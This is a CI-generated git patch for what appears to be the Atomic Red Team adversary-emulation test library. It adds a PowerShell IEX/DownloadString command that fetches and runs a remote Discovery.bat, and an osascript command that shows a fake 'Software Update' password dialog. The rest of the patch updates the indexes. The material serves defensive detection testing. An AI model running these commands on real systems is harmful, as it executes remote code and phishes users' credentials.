From 2a40652162be071bfb6020ac5ef243136ac66f85 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Tue, 21 May 2019 12:09:28 +0000
Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs
 branch=master

---
 atomics/T1074/T1074.md   | 19 +++++++++++++++++--
 atomics/T1141/T1141.md   | 20 ++++++++++++++++++--
 atomics/index.md         |  6 ++++--
 atomics/index.yaml       | 28 ++++++++++++++++++++++++++++
 atomics/linux-index.md   |  2 +-
 atomics/macos-index.md   |  3 ++-
 atomics/windows-index.md |  3 ++-
 7 files changed, 72 insertions(+), 9 deletions(-)

diff --git a/atomics/T1074/T1074.md b/atomics/T1074/T1074.md
index 3b968eb4..e285a19a 100644
--- a/atomics/T1074/T1074.md
+++ b/atomics/T1074/T1074.md
@@ -6,12 +6,27 @@ Interactive command shells may be used, and common functionality within [cmd](ht
 
 ## Atomic Tests
 
-- [Atomic Test #1 - Stage data from Discovery.sh](#atomic-test-1---stage-data-from-discoverysh)
+- [Atomic Test #1 - Stage data from Discovery.bat](#atomic-test-1---stage-data-from-discoverybat)
+
+- [Atomic Test #2 - Stage data from Discovery.sh](#atomic-test-2---stage-data-from-discoverysh)
 
 
 <br/>
 
-## Atomic Test #1 - Stage data from Discovery.sh
+## Atomic Test #1 - Stage data from Discovery.bat
+Utilize powershell to download discovery.bat and save to a local file
+
+**Supported Platforms:** Windows
+
+
+#### Run it with `powershell`!
+```
+"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')" > c:\windows\pi.log
+```
+<br/>
+<br/>
+
+## Atomic Test #2 - Stage data from Discovery.sh
 Utilize curl to download discovery.sh and execute a basic information gathering shell script
 
 **Supported Platforms:** Linux, macOS
diff --git a/atomics/T1141/T1141.md b/atomics/T1141/T1141.md
index f049c14a..f0e57adc 100644
--- a/atomics/T1141/T1141.md
+++ b/atomics/T1141/T1141.md
@@ -6,12 +6,28 @@ Adversaries may mimic this functionality to prompt users for credentials with a
 
 ## Atomic Tests
 
-- [Atomic Test #1 - PowerShell - Prompt User for Password](#atomic-test-1---powershell---prompt-user-for-password)
+- [Atomic Test #1 - AppleScript - Prompt User for Password](#atomic-test-1---applescript---prompt-user-for-password)
+
+- [Atomic Test #2 - PowerShell - Prompt User for Password](#atomic-test-2---powershell---prompt-user-for-password)
 
 
 <br/>
 
-## Atomic Test #1 - PowerShell - Prompt User for Password
+## Atomic Test #1 - AppleScript - Prompt User for Password
+Prompt User for Password (Local Phishing)
+Reference: http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html
+
+**Supported Platforms:** macOS
+
+
+#### Run it with `sh`!
+```
+osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return  default answer "" with icon 1 with hidden answer with title "Software Update"'
+```
+<br/>
+<br/>
+
+## Atomic Test #2 - PowerShell - Prompt User for Password
 Prompt User for Password (Local Phishing) as seen in Stitch RAT.
 
 Reference: https://github.com/nathanlopez/Stitch/blob/master/PyLib/askpass.py
diff --git a/atomics/index.md b/atomics/index.md
index c79239f3..0a303b78 100644
--- a/atomics/index.md
+++ b/atomics/index.md
@@ -529,7 +529,8 @@
 - [T1056 Input Capture](./T1056/T1056.md)
   - Atomic Test #1: Input Capture [windows]
 - [T1141 Input Prompt](./T1141/T1141.md)
-  - Atomic Test #1: PowerShell - Prompt User for Password [windows]
+  - Atomic Test #1: AppleScript - Prompt User for Password [macos]
+  - Atomic Test #2: PowerShell - Prompt User for Password [windows]
 - T1208 Kerberoasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1142 Keychain](./T1142/T1142.md)
   - Atomic Test #1: Keychain [macos]
@@ -693,7 +694,8 @@
   - Atomic Test #1: Utilize Clipboard to store or execute commands from [windows]
   - Atomic Test #2: PowerShell [windows]
 - [T1074 Data Staged](./T1074/T1074.md)
-  - Atomic Test #1: Stage data from Discovery.sh [linux, macos]
+  - Atomic Test #1: Stage data from Discovery.bat [windows]
+  - Atomic Test #2: Stage data from Discovery.sh [linux, macos]
 - T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1005 Data from Local System](./T1005/T1005.md)
   - Atomic Test #1: Search macOS Safari Cookies [macos]
diff --git a/atomics/index.yaml b/atomics/index.yaml
index 438a11e7..e227ccf8 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -15170,6 +15170,21 @@ credential-access:
       - User
       identifier: T1141
     atomic_tests:
+    - name: AppleScript - Prompt User for Password
+      description: |
+        Prompt User for Password (Local Phishing)
+        Reference: http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html
+      supported_platforms:
+      - macos
+      executor:
+        name: sh
+        command: 'osascript -e ''tell app "System Preferences" to activate'' -e ''tell
+          app "System Preferences" to activate'' -e ''tell app "System Preferences"
+          to display dialog "Software Update requires that you type your password
+          to apply changes." & return & return  default answer "" with icon 1 with
+          hidden answer with title "Software Update"''
+
+'
     - name: PowerShell - Prompt User for Password
       description: |
         Prompt User for Password (Local Phishing) as seen in Stitch RAT.
@@ -19554,6 +19569,19 @@ collection:
         Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
       identifier: T1074
     atomic_tests:
+    - name: Stage data from Discovery.bat
+      description: 'Utilize powershell to download discovery.bat and save to a local
+        file
+
+'
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        command: '"IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat'')"
+          > c:\windows\pi.log
+
+'
     - name: Stage data from Discovery.sh
       description: 'Utilize curl to download discovery.sh and execute a basic information
         gathering shell script
diff --git a/atomics/linux-index.md b/atomics/linux-index.md
index 0a0c980d..4531e1ba 100644
--- a/atomics/linux-index.md
+++ b/atomics/linux-index.md
@@ -95,7 +95,7 @@
 - [T1119 Automated Collection](./T1119/T1119.md)
 - [T1115 Clipboard Data](./T1115/T1115.md)
 - [T1074 Data Staged](./T1074/T1074.md)
-  - Atomic Test #1: Stage data from Discovery.sh [linux, macos]
+  - Atomic Test #2: Stage data from Discovery.sh [linux, macos]
 - T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1005 Data from Local System](./T1005/T1005.md)
 - T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/macos-index.md b/atomics/macos-index.md
index 970d5dd6..dd3b780c 100644
--- a/atomics/macos-index.md
+++ b/atomics/macos-index.md
@@ -145,7 +145,7 @@
 - [T1119 Automated Collection](./T1119/T1119.md)
 - [T1115 Clipboard Data](./T1115/T1115.md)
 - [T1074 Data Staged](./T1074/T1074.md)
-  - Atomic Test #1: Stage data from Discovery.sh [linux, macos]
+  - Atomic Test #2: Stage data from Discovery.sh [linux, macos]
 - T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1005 Data from Local System](./T1005/T1005.md)
   - Atomic Test #1: Search macOS Safari Cookies [macos]
@@ -187,6 +187,7 @@
 - T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1056 Input Capture](./T1056/T1056.md)
 - [T1141 Input Prompt](./T1141/T1141.md)
+  - Atomic Test #1: AppleScript - Prompt User for Password [macos]
 - [T1142 Keychain](./T1142/T1142.md)
   - Atomic Test #1: Keychain [macos]
 - [T1040 Network Sniffing](./T1040/T1040.md)
diff --git a/atomics/windows-index.md b/atomics/windows-index.md
index 9ad857b8..aa3c3cc3 100644
--- a/atomics/windows-index.md
+++ b/atomics/windows-index.md
@@ -360,7 +360,7 @@
 - [T1056 Input Capture](./T1056/T1056.md)
   - Atomic Test #1: Input Capture [windows]
 - [T1141 Input Prompt](./T1141/T1141.md)
-  - Atomic Test #1: PowerShell - Prompt User for Password [windows]
+  - Atomic Test #2: PowerShell - Prompt User for Password [windows]
 - T1208 Kerberoasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1171 LLMNR/NBT-NS Poisoning and Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1040 Network Sniffing](./T1040/T1040.md)
@@ -413,6 +413,7 @@
   - Atomic Test #1: Utilize Clipboard to store or execute commands from [windows]
   - Atomic Test #2: PowerShell [windows]
 - [T1074 Data Staged](./T1074/T1074.md)
+  - Atomic Test #1: Stage data from Discovery.bat [windows]
 - T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1005 Data from Local System](./T1005/T1005.md)
 - T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)